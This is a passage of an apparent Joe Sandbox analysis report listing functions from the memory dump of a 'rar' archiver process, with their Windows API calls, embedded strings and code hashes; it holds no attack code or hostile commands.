• DeviceIoControl.KERNEL32 ref: 00007FF7D79DE357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE362
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
• String ID: SeBackupPrivilege
• API String ID: 3094086963-2429070247
• Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction ID: 20302ad22b6f0c776bdd8c04fdb52b11497d79c4f4bdbdce7ff768ef449cd45d
• Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction Fuzzy Hash: 0561B432A0868286E714AF65E4886FDB361FB84798FC4423ADB6E176D4DF3CD546C720
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
• String ID:
• API String ID: 3116915952-0
• Opcode ID: 41abb0b37b8000e8a53cd72c17e2ad468adb8241ec6e79e21d50c4a62cc1527e
• Instruction ID: 9d404965e9fb04c2373ec5c92061df0cdcb2f3a05045630b190324bdee73fbef
• Opcode Fuzzy Hash: 41abb0b37b8000e8a53cd72c17e2ad468adb8241ec6e79e21d50c4a62cc1527e
• Instruction Fuzzy Hash: 1AE13C23A08A8381EE24FF25D4555EDA7A5FB85788FD45033DE4D0B7AADE38D506CB20
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                      • API String ID: 0-2756464174
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A28704
  • Part of subcall function 00007FF7D7A24E3C: GetCurrentProcess.KERNEL32(00007FF7D7A29CC5), ref: 00007FF7D7A24E69
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 932687459-0
Uniqueness
• Uniqueness Score: -1.00%

Similarity
• API ID: swprintf
• String ID: ;%u$x%u$xc%u
• API String ID: 233258989-2277559157
Uniqueness
• Uniqueness Score: -1.00%

Similarity
• API ID: FileMoveNamePath$CompareLongShortStringswprintf
• String ID: rtmp%d
• API String ID: 2308737092-3303766350
Uniqueness
• Uniqueness Score: -1.00%

Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
Uniqueness
• Uniqueness Score: -1.00%

Similarity
• API ID: AddressProc$HandleModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 667068680-1824683568
Uniqueness
• Uniqueness Score: -1.00%

Similarity
• API ID: Backup$Read$Seek$wcschr
• String ID:
• API String ID: 2092471728-0
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: CurrentImageNonwritableUnwindabort
• String ID: csm$f
• API String ID: 3913153233-629598281
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: AddressCompareHandleModuleOrdinalProcStringVersion
• String ID: CompareStringOrdinal$kernel32.dll
• API String ID: 2522007465-2120454788
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
• Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction ID: 06e20125fa423b071573efbabde6004a2b209852db25fe66b786b196be689f77
• Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction Fuzzy Hash: 5751E332A14A5186E714DF69D444BADBBB0FB84798F849136DF0E57A98DF38D142C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CharHandleWrite$ByteConsoleFileMultiWide
• String ID:
• API String ID: 643171463-0
• Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction ID: f2c41f2ab90ecf1bf56c09e4c1d97e9d0cb3e014d5f2c6a6aeffb2b563d4f395
• Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction Fuzzy Hash: EF41F812E0864242F928BB249545ABDE251BF85BA4FC81337ED6D176D6DE3CE4478720
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: wcschr$BeepMessage
• String ID: ($[%c]%ls
• API String ID: 1408639281-228076469
• Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction ID: 8e0f7b2b4fa3d131a77874baed9a3cb5adabde44427a67b2f772ade468093d19
• Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction Fuzzy Hash: 5681C823608A5282EA64EF15E4806BEA7A1FB84788FD80536EF4D57759EF3CD543C710
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 00007FF7D79E359E
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E35E6
  • Part of subcall function 00007FF7D79E30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF7D79E305D,?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800), ref: 00007FF7D79E30F0
  • Part of subcall function 00007FF7D79E30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7D79E3119
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E3651
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: AttributesFileswprintf$CurrentProcess
• String ID: %u.%03u
• API String ID: 2814246642-1114938957
• Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
• Instruction ID: 5dfd51451f74d7dea88e781fa2c4e8a9645b452caf1b3cc4d8737b38f4b18173
• Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
• Instruction Fuzzy Hash: 7D312A2261898252EB14AB38E4116BEE660BB847B8FD01733E97E47BE1DE3DD4078710
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction ID: 4b76c2ca52e3382d6e2c5c24f482da5584067cf1240ae3521c26a4c8a48365d9
• Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction Fuzzy Hash: 8B41A322B19B4182E754AF69E4447AEA761F784794FC05032EE4D87784DF3CD542C750
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                                                                                      • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction ID: 3745a345e12f063295a8892f1970bb5aa12a80edf3f53ec77fffe2085e5703a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E21447AA0864186F634EF19E04066EB761F7C4BA5F801236DE9D03B95CF3CE842CB20

Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: wcschr$swprintf
• String ID: %c:\
• API String ID: 1303626722-3142399695
• Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction ID: 128eb4fde14258d603e8c63ed911c0f945b48f6a52ff32f9506983ce7faaa9e9
• Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction Fuzzy Hash: 0A115E23A0874281EE247F11964106DF260AF85BD4BD89536DF6E537E6EF7CE4638321

Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
• Instruction ID: 3ff59f91e31a2b29dae0e5c867fc3ec5c08f0e1205619f856c3c87566885931d
• Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
• Instruction Fuzzy Hash: A9110632B0564186F7489F29E4447AE76A2EBC4B49FC8843BCA4D07299CF3DD4578750

Uniqueness
Uniqueness Score: -1.00%
APIs
• CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D), ref: 00007FF7D79E38CD
• CreateFileW.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E391F
• SetFileTime.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E399B
• CloseHandle.KERNEL32(?,?,?,?,?,00007FF7D79DF6FC,00000000,?,?,?,?,00007FF7D79E097D,?,?,00000000), ref: 00007FF7D79E39A6
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
• Instruction ID: 0c2145007d4eef6275893e2c3c5d0500a8d15a12abab94ec7f321ea7e33056d2
• Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
• Instruction Fuzzy Hash: 3841D423B0E64242EA54AB25E41177EE7A1BB817A8FD04232EE9D477E4DF7CD40B8710

Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
• Instruction ID: 31ea00cdedff810ede2af6281178ed4def28c0db4c12950585a535f56cca9e1c
• Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
• Instruction Fuzzy Hash: 24419651A0DAD285FB59AB28D1507BEB390EB90B88FD84533DF4D06699DF2CD4478334

Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141327611-0
                                                                                                                                                                      • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction ID: 4a03af3793ef3197a5b8f6da0da9415159e4a401abecac473e4c2c13b3826ba4
                                                                                                                                                                      • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction Fuzzy Hash: A141A222A0D78246FB6DBB589041B7DE690BFD1B94FD45172DE4866AC5CF3CE8438720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A297A5
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A29807
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A29841
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A2986B
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1557788787-0
                                                                                                                                                                      • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction ID: dd8e76bf1ce2a771cd6de05c28fd2093af3220f8e6a347f023f1117dbca0c397
                                                                                                                                                                      • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction Fuzzy Hash: C3218121E0875181E628AF1AA44092EE6A4FB94FD0FCC5136DE9E33BA4DF3CE4538714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1171435874-0
                                                                                                                                                                      • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction ID: 6ddd54cad938b403863d9e734666930755ad69ad25f1540e5f929769cf9fa3be
                                                                                                                                                                      • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction Fuzzy Hash: AF118631E0864287E668AB28DA84A7DA251EFC4745FE00877C70F27688DF2CBC474720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1447195878-0
                                                                                                                                                                      • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                      • Instruction ID: 63104cdde70d50aa42a66bb0254160328e634fb8d5ce71dc275214e7fc117492
                                                                                                                                                                      • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 13018010B0960343FA5C777D965693DD192AFC8788FC82537D91E267D2ED2DA8034235
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                                                                                      • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction ID: 004ed4949269af8a0df422791c2d2a8c982114f8e306b18d9a66f774a8898526
                                                                                                                                                                      • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction Fuzzy Hash: 58916962B093C646EB199F2D9186B7CAB95BBA17D4F849172CA8D07391EA3CE503C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
